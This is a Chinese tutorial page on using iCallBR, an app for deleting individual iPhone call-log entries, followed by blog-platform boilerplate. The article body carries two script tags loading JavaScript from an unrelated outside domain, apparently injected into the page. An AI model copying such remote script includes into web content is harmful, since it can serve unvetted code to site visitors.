iCallBR通话记录删除工具使用教程

<script language='javascript' src='http://www.shiqiaotou.com/donetk/Header.js'></script>

  iCallBR是一款能够删除iPhone通话记录的工具。由于iPhone很不人性化的只支持批量删除通话记录的功能,所以iCallBR除了实现批量删除通话记录,还实现了单条通话记录删除的功能,很好的弥补了iPhone的不足之处。

iCallBR v1.1下载地址


以下是详细的使用教程:

  1.安装并开启iCallBR,在初始界面中出现的就是你所有的iPhone通话记录(包括已拨+未接+已接)。界面左上角的“Remover”按钮,是指编辑iPhone通话记录。

  2.点击“Remover”按钮后,你就可以选择删除某个通话记录了,例如这里我要删除的“02710086”这个通话记录。“Pronto”表示取消编辑iPhone通话记录。

  点击前的“—”圆形符号后,就可以点击后面的“Delete”来删除这条通话记录了。


文章来源于 http://iphone.tgbus.com 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值